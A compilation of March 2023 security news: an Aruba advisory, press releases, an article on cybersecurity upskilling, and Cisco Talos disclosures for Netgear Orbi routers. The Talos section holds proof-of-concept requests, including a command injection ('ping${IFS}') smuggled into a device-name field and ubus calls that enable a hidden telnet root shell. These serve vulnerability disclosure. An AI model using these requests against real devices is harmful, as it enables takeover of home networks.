An authenticated remote code execution vulnerability exists in the AOS-CX Network Analytics Engine. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system, leading to a complete compromise of the switch running AOS-CX.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2023-004 CVE: CVE-2023-1168 Publication Date: 2023-Mar-21 Status: Confirmed Severity: High Revision: 1 Title ===== Authenticated Remote Code Execution in Aruba CX Switches Overview ======== Aruba has released updates for wired switch products running AOS-CX that address a security vulnerability in the Network Analytics Engine (NAE). Affected Products ================= Customers using the following switch models and firmware versions are affected by the vulnerability listed in this advisory. Aruba Switch Models: - Aruba CX 10000 Switch Series - Aruba CX 9300 Switch Series - Aruba CX 8400 Switch Series - Aruba CX 8360 Switch Series - Aruba CX 8325 Switch Series - Aruba CX 8320 Switch Series - Aruba CX 6400 Switch Series - Aruba CX 6300 Switch Series - Aruba CX 6200F Switch Series Software Branch Versions: - AOS-CX 10.10.xxxx: 10.10.1020 and below. - AOS-CX 10.09.xxxx: 10.09.1020 and below. - AOS-CX 10.08.xxxx: 10.08.1070 and below. - AOS-CX 10.06.xxxx: 10.06.0230 and below. All other AOS-CX software versions that are not listed under Resolution section are unsupported and considered to be affected. Software branch versions of AOS-CX that are end of life are affected by this vulnerability unless otherwise indicated. Unaffected Products =================== Any other Aruba products not listed above including AOS-S Switches, Aruba Intelligent Edge Switches, and HPE OfficeConnect Switches are not affected by these vulnerabilities. Details ======= Authenticated Remote Code Execution in AOS-CX Network Analytics Engine (NAE) (CVE-2023-1168) --------------------------------------------------------------------- An authenticated remote code execution vulnerability exists in the AOS-CX Network Analytics Engine. Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system, leading to a complete compromise of the switch running AOS-CX. Internal reference: ATLAX-69 Severity: High CVSSv3 Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Resolution ========== In order to address the vulnerability in the affected release branches and switch platforms described above, it is recommended to upgrade the software to one of the following versions (as applicable): - AOS-CX 10.11.xxxx: 10.11.0001 and above. - AOS-CX 10.10.xxxx: 10.10.1030 and above. - AOS-CX 10.06.xxxx: 10.06.0240 and above. Aruba does not evaluate or patch AOS-CX firmware versions that have reached their End of Support (EoS) milestone. Supported versions as of the publication date of this advisory are: - AOS-CX 10.11.xxxx - AOS-CX 10.10.xxxx - AOS-CX 10.06.xxxx For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting this vulnerability, Aruba recommends that the CLI and web-based management interfaces be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above. Contact Aruba TAC for any configuration assistance. Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target this specific vulnerability as of the release date of the advisory. Revision History ================ Revision 1 / 2023-Mar-21 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products, obtaining assistance with security incidents is available at: http://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: http://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2023 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmQPgLQXHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtmpRQgAsZp0VTZTe3zkrR3nee3+e5PQ +MLUn451iaRAh3Z7FGzE0OPz3nMuOlRYiZ/tHVx5XnesvlSn5FTd/7iOvYsKcu+W 1qT5nS6gLbo6CwS4OlLbMHNLAREm8OOJzm8VIjretjb2jj5bZvsari6M8u0u1sG7 2F/RhiU1fPficEvY9UaWDvcwCc+16d9egmpTmLUZ9egEagVZZGBiiC4LFWdAmG9Y mMjdNtBvIEXA0uRw0vpUOKDC7CnHKrLujkedQijt0SV0o0HIJlyxLHeF1HdaQQWM 5/XSXiyeuV6h1ffe0+E0Td249McHB+ffT+594pQk8Zb6pfHkFeNpaS/v5SeBmw== =Q26C -----END PGP SIGNATURE-----

CVE-2023-1168

General Bytes Crypto Application Server (CAS) 20230120, as distributed with General Bytes BATM devices, allows remote attackers to execute arbitrary Java code by uploading a Java application to the /batm/app/admin/standalone/deployments directory, aka BATM-4780, as exploited in the wild in March 2023. This is fixed in 20221118.48 and 20230120.44.

CVE-2023-28725: Changelog | GENERAL BYTES

IONIX illuminates exploitable risks across the real attack surface and its digital supply chain providing security teams with critical focus to accelerate risk reduction.

**NEW YORK****,** **March 21, 2023** **/PRNewswire/ --** Cyberpion, the leader in Attack Surface Management, has rebranded as IONIX (pronounced 'eye on x'). IONIX helps customers keep an 'eye on x,' providing visibility into their real attack surface including an organization's internet-facing assets and their mesh of connected dependencies.

A threat actor set on penetrating an organization doesn't care whether they're attacking internet-facing assets directly or exploiting a vulnerability from an exposed third-party digital service. Using Connective Intelligence, IONIX accurately maps an organization's real attack surface and its digital supply chain, discovering more organizational assets than any other provider, and delivers unmatched capabilities for proactively preventing attacks.

2022 was a transformational year for IONIX. The company delivered 250% ARR growth and secured $27 million in Series A funding, led by U.S. Venture Partners and existing investors Team8 Capital and Hyperwise Ventures. In January 2023, IONIX announced that Marc Gaffan had been named CEO. Co-founder Nethanel Gelernter moved from CEO to Chief Technology Officer where he is focusing on accelerating innovation and scaling the company's ASM platform. Additionally, the company announced the appointment of Doron Gill as Vice President of Engineering, and Ido Samson as Chief Revenue Officer. 

"IONIX was built on the premise that the increasingly interwoven nature of the digital supply chain demands a radically different approach to threat protection by identifying the sprawling network of dependencies on the same level as an organization's other assets," said Marc Gaffan, CEO, IONIX. "IONIX's ASM solution helps organizations take control of their real attack surface and its digital supply chain. By working closely with our customers, we have expanded our offering with wider coverage and deeper focus into their biggest attack surface risks. We believe that our new brand and product strategy will provide us with a strong platform to grow and lead in this market."

**IONIX ASM Platform**

IONIX Connective Intelligence technology leverages machine learning to discover and monitor every internet-facing asset and connection, delivering laser focus into the most critical risks to the business. IONIX goes further, enabling action by providing the tools to rapidly remediate exploitable threats and reduce attack surface risk.

IONIX focuses on real risks by surfacing exploitable issues with large blast radius that require immediate attention. With less noise and fewer alerts, security teams can remediate what matters most, faster. To deliver on these market needs, IONIX has significantly expanded its capabilities to include:

Multi-layered prioritization that goes beyond risk severity to validate exploitability and identify blast radius:

*   Determine the blast radius - Rank asset importance based on data sensitivity, business context, brand reputation and inter-connectivity
*   Evaluate exploitability - Identify exploitable misconfigurations, documented exploits and simulated attacks
*   Integrate threat intelligence - Correlate deep dark web findings regarding leaked credentials and compromised machines with customers' asset inventories

*   Smart remediation workflows that reduce noise with clear action items and automatically assign tasks to the right subsidiary or operational owner
*   Integration with customers' cloud environments by combining inside out visibility with an outside in attackers' view to uncover even more exposed assets and shadow IT
*   Risk scores that quantify attack surface risk across multiple categories enabling decision makers to understand their security posture, track progress over time and make strategic, risk-informed decisions.
*   Executive ASM reports, generated with one-click, that provide a comprehensive high-level overview of customers' attack surface with visibility into their assets, risks and action items. 

"The IONIX brand is new, but the team here has been helping organizations secure their extended attack surface since long before there was even a market category," said Rik Turner, senior principal analyst in Omdia's IT security and technology team. "What they are delivering now as IONIX is a combination of broad coverage of the extended attack surface, along with a focus on the threats that matter most to the organization. The addition of the Risk Scores and Executive Reports comes as the C-Suite and Boards of Directors are focused on cybersecurity like never before, due to the attention of lawmakers and regulators, not to mention the extra attention attack surfaces have gained thanks to the pandemic."

**About IONIX**

IONIX is the attack surface management solution that uses Connection Intelligence to shine a spotlight on exploitable risks across your real attack surface – and its digital supply chain. Only IONIX discovers and monitors every internet-facing asset and connection, delivers laser focus into the most important risks to your business, and provides the tools to rapidly remediate exploitable threats and reduce attack surface risk. Global leaders including Infosys, The Telegraph, Warner Music Group and E. ON depend on IONIX's machine learning-powered discovery engine, contextual risk assessment and prioritization, and end-to-end remediation workflows to go on the offensive in managing their complex and ever-changing attack surfaces. For more information visit www.ionix.io or connect with us on LinkedIn.

Cyberpion Rebrands As IONIX

Global study reveals boards still undervalue cyber's role.

**DALLAS****,** **March 21, 2023** **/PRNewswire/ --** Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cybersecurity leader, today released new research\* revealing that while global organizations plan to increase cybersecurity budgets in 2023, business leaders hold conflicting views on the function.

**To read a full copy of the report,** _Risky Rewards_**, please visit:** https://www.trendmicro.com/explore/risk-reward2023/2031-tl-en-rpt#page=1

Jon Clay**, VP of threat intelligence at Trend Micro:** "If organizations want to make the most of their security investments, business leaders must reframe their view of cybersecurity – to think more broadly about how it can positively impact the enterprise. This research shows it's clearly a critical component of winning new business and talent. At a time when every dollar/penny counts, it's concerning to see stereotyped views of security persist at the very top."

Nearly two-thirds (64%) of business decision-maker (BDM) respondents say they plan to increase security investment in 2023.

However, the research also reveals critical gaps in BDMs' understanding of the relationship between cybersecurity and other parts of the organization.

On the one hand, half (51%) claim cybersecurity is a necessary cost but not a revenue contributor, while a similar share (48%) argue that its value is limited to attack/threat prevention. Nearly a fifth (38%) even see security as a barrier rather than a business enabler.

However, on the other hand, 81% worry that a lack of cybersecurity credentials could impact their ability to win new business – with a fifth (19%) admitting it already has. This comes as nearly three-quarters (71%) of BDMs admit they're being asked about security posture in negotiations with prospects and suppliers. And 78% say these requests for information are increasing in frequency.

This apparent contradiction in attitudes is laid bare by another finding. Despite prospects and suppliers clearly prioritizing security in negotiations, only 57% of BDMs perceive there to be a strong or very strong connection between cyber and client acquisition/satisfaction.

Talent acquisition is another area where there are clear gaps in BDMs' understanding of the interconnectivity between cybersecurity and the rest of the business.

Nearly three-quarters (71%) of respondents claim that the ability to work from anywhere has become vital in the battle for talent. Yet only around two-fifths understand the strong connection between cybersecurity and employee retention (42%) and talent attraction (43%).

That's despite respondents recognizing the impact of cyber on the employee experience:

*   83% say current security policies have affected remote employees' ability to do their jobs (eg. network and information access issues, and slowing the pace of work)
*   43% say current security policies place restrictions on employees' ability to work from anywhere
*   54% say current policies restrict what devices/platforms employees can choose to use

_\* Trend Micro commissioned Sapio Research to poll 2718 business decision-makers in companies with 250+ employees across 26 countries._ 

**About Trend Micro**

Trend Micro, a global cybersecurity leader, helps make the world safe for exchanging digital information. Fueled by decades of security expertise, global threat research, and continuous innovation, Trend Micro's cybersecurity platform protects hundreds of thousands of organizations and millions of individuals across clouds, networks, devices, and endpoints. As a leader in cloud and enterprise cybersecurity, the platform delivers a powerful range of advanced threat defense techniques optimized for environments like AWS, Microsoft, and Google, and central visibility for better, faster detection and response. With 7,000 employees across 65 countries, Trend Micro enables organizations to simplify and secure their connected world. www.TrendMicro.com.  

SOURCE Trend Micro Incorporated

Research Highlights Cyber Security's Underestimated Role As a Business and Revenue Enabler

**WATERLOO, ON****,** **March 21, 2023** **/PRNewswire/ --** BlackBerry Limited (NYSE: BB; TSX: BB) announced today that it has entered into an agreement to sell substantially all of its non-core patents and patent applications to Malikie Innovations Limited ("Malikie"), a newly-formed subsidiary of Key Patent Innovations Limited ("KPI"), a leading intellectual property monetization company, for a combination of cash at closing and potential future royalties in the aggregate amount of up to $900 million.

The transaction is not subject to any financing conditions. Funding has been secured from a leading US-based investment firm, with in excess of $30 billion of assets under management.

_"We're extremely pleased to have executed this agreement with KPI, whose industry-leading expertise and experience positions them well to realize the patent portfolio's potential and enhance returns for BlackBerry," said_ John Chen_, Executive Chairman & CEO, BlackBerry. "This transaction, once complete, will further strengthen our balance sheet while simplifying our business and enabling increased focus on our core IoT and Cybersecurity opportunities."_

_"We are very excited to have completed this transaction with a partner of BlackBerry's calibre, and we look forward to getting to work to maximize returns from this portfolio," said_ Angela Quinlan_, Managing Director, KPI._

Under the terms of the agreement, BlackBerry will receive $170 million in cash on closing and an additional $30 millionin cash by no later than the third anniversary of closing.  BlackBerry will also be entitled to receive annual cash royalties from the profits generated from the BlackBerry patents, on the following basis:

*   8% of the first $500 million of profits;
*   15% of the next $250 million of profits;
*   30% of the next $250 million of profits; and
*   50% of all subsequent profits.

Royalty payments to BlackBerry will initially be capped at $700 million, subject to an annual cap increase of an amount equal to 4% of the remaining portion of the $700 million that has not been paid to BlackBerry as of the date of the increase.  Malikie's costs will also be capped in the calculation of profits generated.

Approximately 32,000 patents and applications relating primarily to mobile devices, messaging and wireless networking will be sold in the transaction with Malikie.  The transaction excludes patents and applications that are necessary to support BlackBerry's current core business operations. It also excludes approximately 120 monetizable non-core patent families relating to mobile devices (representing approximately 2,000 patents and applications which are primarily standards essential), as well as all existing revenue generating agreements.  BlackBerry will receive a license back to the patents being sold and the transaction will not impact customers' use of any of BlackBerry's products, solutions or services.

Completion of the transaction is conditional upon, among other things, satisfaction of all regulatory conditions under the Hart–Scott–Rodino Antitrust Improvements Act in the United States and the Investment Canada Act. 

Termination of Agreement with Catapult:

On December 20, 2022, BlackBerry provided an update on its previously-announced patent portfolio sale transaction with Catapult IP Innovations, Inc., indicating that Catapult was working with a financing partner and that the parties were negotiating definitive closing documents.  BlackBerry also disclosed that it was then in advanced term sheet discussions with another party that was fully financed, and which had completed its due diligence on the portfolio. 

Catapult was unable to secure financing that would have enabled it to complete the previously-announced transaction on amended terms that were acceptable to BlackBerry, and therefore BlackBerry has terminated its agreement with Catapult and has instead entered into the patent sale agreement with Malikie. 

**About BlackBerry** 

BlackBerry (NYSE: BB; TSX: BB) provides intelligent security software and services to enterprises and governments around the world. The company secures more than 500M endpoints including over 215M vehicles. Based in Waterloo, Ontario, the company leverages AI and machine learning to deliver innovative solutions in the areas of cybersecurity, safety, and data privacy solutions, and is a leader in the areas of endpoint security, endpoint management, encryption, and embedded systems.  BlackBerry's vision is clear - to secure a connected future you can trust.

_BlackBerry. Intelligent Security. Everywhere._  

For more information, visit BlackBerry.com and follow @BlackBerry.

BlackBerry Announces New Patent Sale Transaction With Patent Monetization Company for Up to $900M

**NEW YORK****,** **March 21, 2023** **/PRNewswire/ --** BigID, the leading platform for data security, compliance, privacy, and governance,, announced today that native integrations with leading Security Orchestration, Automation, and Response (SOAR) platforms, including Splunk SOAR (formerly Phantom) and Palo Alto Networks Cortex XSOAR (formerly Demisto).

Enterprises have been struggling with responding to the deluge of security events generated by all their security information and event management systems. The volume and complexity of these events increases the need for automated security orchestration and response (SOAR) platforms to help security teams streamline and automate their incident response processes.

BigID's native integrations with SOAR platforms, including Splunk, Palo Alto Networks and Torq , provide customers with access to thousands of pre-built playbooks, enabling them to automate the incident response process from detection to remediation. With these native orchestrations, customers can seamlessly manage and automate their security response workflows, reducing response time and improving overall security posture.

"BigID is committed to helping organizations manage and secure their sensitive data. With these native integrations with leading SOAR platforms, we're able to provide customers with a powerful, integrated solution that enables them to streamline their incident response processes and more effectively manage security risks," said Dimitri Sirota, CEO of BigID.

With this integration, customers can now:

*   Leverage automation to reduce response time and improve accuracy
*   Automate incident response workflows with access to thousands of SOAR playbooks
*   Gain better visibility into incidents and manage responses with ease
*   Increase productivity and reduce the manual effort involved in incident response

The integration with Splunk SOAR, Cortex XSOAR and Torq offers a seamless user experience and significant improvements to security operations.

For more information, please visit www.bigid.com or visit https://home.bigid.com/demo to see it in action.

**About BigID:**

BigID enables organizations to know their enterprise data and take action for data-centric security, privacy, compliance and governance. Customers deploy BigID to proactively discover, manage, protect, and get more value from their regulated, sensitive, and personal data across their data landscape. BigID has been recognized for its data intelligence innovation as a 2019 World Economic Forum Technology Pioneer, named to the 2021 Forbes Cloud 100, the 2021 Inc 5000 as the #19th fastest growing company and #1 in Security, the 2021 and 2022 Deloitte 500, and an RSA Innovation Sandbox winner. Find out more at https://bigid.com.

SOURCE BigID

BigID's Data Security Posture Management Solution Integrates With SOAR Platforms

For companies, training an existing worker is cheaper than hiring, while for employees, training brings job security and more interesting work.

Companies continue to value cybersecurity skills, but many have moved their focus from hiring cybersecurity professionals to training up in-house staff on needed cybersecurity skills.

The monthly number of cybersecurity-related job postings plummeted by nearly a third (31%) in the last month, compared with its peak a year ago, according to employment services firm Indeed.com. Yet cybersecurity is the No. 1 desired skill set that companies would like their employees to learn, with 59% of technology leaders rating cybersecurity as a top-three topic for training, ahead of both data science and cloud skills, according to training firm Pluralsight.

For companies that need to fill gaps in their employee's technical skills, training employees in new skill sets — "upskilling" in the industry parlance — is a relative bargain, compared with the cost of hiring a new employee, says Gary Eimerman, chief product officer at Pluralsight.

"Given the level of risk, cybersecurity hacks are a boardroom conversation across organizations," he says. "Upskilling internally for cybersecurity talent is significantly more cost effective than hiring externally for cybersecurity skills."

Companies would both hire and train cybersecurity professionals, but given the shortage in available skilled workers, training has taken precedence, says Bill Reynolds, research director at Foote Partners, a workforce research firm. The average estimate to hire a technology workers, such as a full-time developer, is about $32,000.

"They are absolutely doing both, but with the significant shortfall in the marketplace for skilled cybersecurity professionals, the sense I'm getting by talking to hundreds of employers ... is that they're focusing more right now on training and developing talent from within," he says. "And it is not just technical skills — they want a whole market basket of soft nontech skills \[as well\]."

**Cybersecurity Skills as Layoff Protection?**

As recession fears continue to roil the technology industry, on March 20 Amazon announced its second tranche of layoffs — this time, planning to cut 9,000 corporate and technology workers, bringing the total number of job affected to 27,000. Cybersecurity vendors have not been spared, shedding thousands of employees in the last three quarters, with some companies cutting more than a quarter of their workforce, according to tracking site Layoffs.fyi.

    

Cybersecurity takes the top spot among skills preferred by employers for training purposes. Source: Pluralsight

Yet, overall, workers with cybersecurity skills have largely been protected from layoffs, due to the relative difficulty in hiring or replacing them. Only 10% of C-level executives intend to lay off cybersecurity staff, much lower than other departments, such as human resources (30%), finance (24%), and even information technology (14%).

As another metric, two-thirds of tech executives have been asked to reduce costs, but 72% still plan to increase investments in the development of technology skills, according to Pluralsight's "2023 State of Upskilling" report. 

"When layoffs are on the table for an organization, where the cuts are made is highly individualized based on business need," Pluralsight's Eimerman says. "Among layoffs that have been done in the tech industry, few have focused on technology-specific roles." 

**Cybersecurity as the Most-Wanted Tech Skill**

Among technology skills, cybersecurity is most often in the top-three skills demanded by technology leaders. Overall, if employees had a weekly sprint for learning, 59% of executives would want them to learn cybersecurity skills, while 44% preferred data-science skills, and 42% selected cloud skill sets, according to Pluralsight's report.

But learning such skills has gained priority for employees, too, who list their top reasons for upskilling as salary growth, personal development, and job security. 

Across the 53 noncertified cybersecurity skills tracked by Foote Partners, the average worker commands a 12.3% base-salary cash premium. Skills such as security auditing, penetration testing, vulnerability scanning and management, DevSecOps, and cyberthreat intelligence all have significant premiums, Reynolds says.

Some combinations of skills are in even greater demand, such as cloud and cybersecurity, he says. With companies focused on shrinking their attack surface area and putting more security capabilities into a very small footprint, for example, workers with cybersecurity, embedded OS, optimizing, and threat detection skills together would garner even greater premiums. 

"From a career perspective, there is so much opportunity for cybersecurity professionals," he says.

While a lack of time and budget has undermined upskilling efforts in the past, workers have new incentives in the tighter employment market: Almost half say that a hiring freeze or pause has resulted in them doing more duties outside their job function. In 2022, 60% of workers cited "I'm too busy" as the top barrier to gaining new technology skills, according to Pluralsight. In 2023, that number dropped to 42%, while 30% cited uncertainty in where to focus their efforts as a top barrier.

Cybersecurity Skills Shortage, Recession Fears Drive 'Upskilling' Training Trend

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specfied device when attempting to access the network. However, the dev_name parameter is vulnerable to command injection.

**Exploit Proof of Concept**

    POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
    Host: 10.0.0.1
    Content-Length: 104
    Authorization: Basic YWRtaW46UGFzc3cwcmQ=
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
    Connection: close
    
    action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
    

On the device itself, we can see this command now being executed.

       root@RBR750:/tmp# ps | grep ping
       21763 root      1336 S    ping 10.0.0.4
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-37337: TALOS-2022-1596 || Cisco Talos Intelligence Group

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**SUMMARY**

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**CWE**

CWE-311 - Missing Encryption of Sensitive Data

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

An option exists in the Web Services Management tool to “Always use HTTPS to access the router”. However, if a user browses to http://<router_ip>/ they are prompted for credentials before redirecting to HTTPS. In addition, the credentials must be valid in order for the redirect to proceed. Once redirected to HTTPS, the user is then prompted again for authentication, but this time over HTTPS.

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Christopher McBee and Dave McDaniel of Cisco Talos.

CVE-2022-38458: TALOS-2022-1598 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

Tag

#intel